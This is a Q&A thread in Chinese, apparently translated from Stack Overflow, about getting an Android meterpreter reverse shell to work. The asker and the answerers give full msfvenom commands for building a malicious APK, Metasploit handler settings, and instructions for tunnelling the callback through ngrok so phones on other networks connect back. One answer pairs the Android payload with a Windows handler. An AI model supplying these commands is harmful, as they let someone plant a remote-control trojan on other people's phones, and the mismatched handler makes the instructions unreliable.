我使用以下命令创建了一个有效负载
msfvenom android/meterpreter/reverse_tcp LHOST=192.168.2.2 R > ANDROID.apk在apk上签名,把它发到我的手机上,打开msfconsole然后跑了
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.2
exploit在这之后,我安装了apk并在我的手机上打开了它,得到了类似于下面的东西:
msf exploit(handler) > [*] Sending stage (179267 bytes) to [target IP]
[*] Meterpreter session 1 opened ( [attacker IP:port] -> [target IP: port] ) at 2021-6-03 17:54:27 -0300我不能使用sessions -i 1 (如here),因为当我在控制台中输入内容时,按enter键什么也不做。我可以打开一个新的msfconsole,但它显示没有活动的会话。
发布于 2021-05-07 22:29:11
您必须在apk有效负载和Metasploit中设置LPORT才能建立反向连接。
示例:
msfvenom android/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4444 R > ANDROID.apkMetasploit中的:
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.2
set LPORT 4444
exploit发布于 2021-08-09 09:58:00
如果您的电话和计算机不在同一网络中,则需要将端口转发到调制解调器。这对于将传入的ip地址从调制解调器转发到它自己的ip是必要的。您也可以从调制解调器的接口设置中执行此操作。you can see it here
2-您可以使用隧道服务,例如ngrok
使用起来非常简单
在terminal
./ngrok tcp 4242
android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=11620 R > /root/FileName.apk (也会为您提供lport打开的隧道)然后是msfconsole设置
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4242
exploit -j -zhttps://stackoverflow.com/questions/67394236
复制相似问题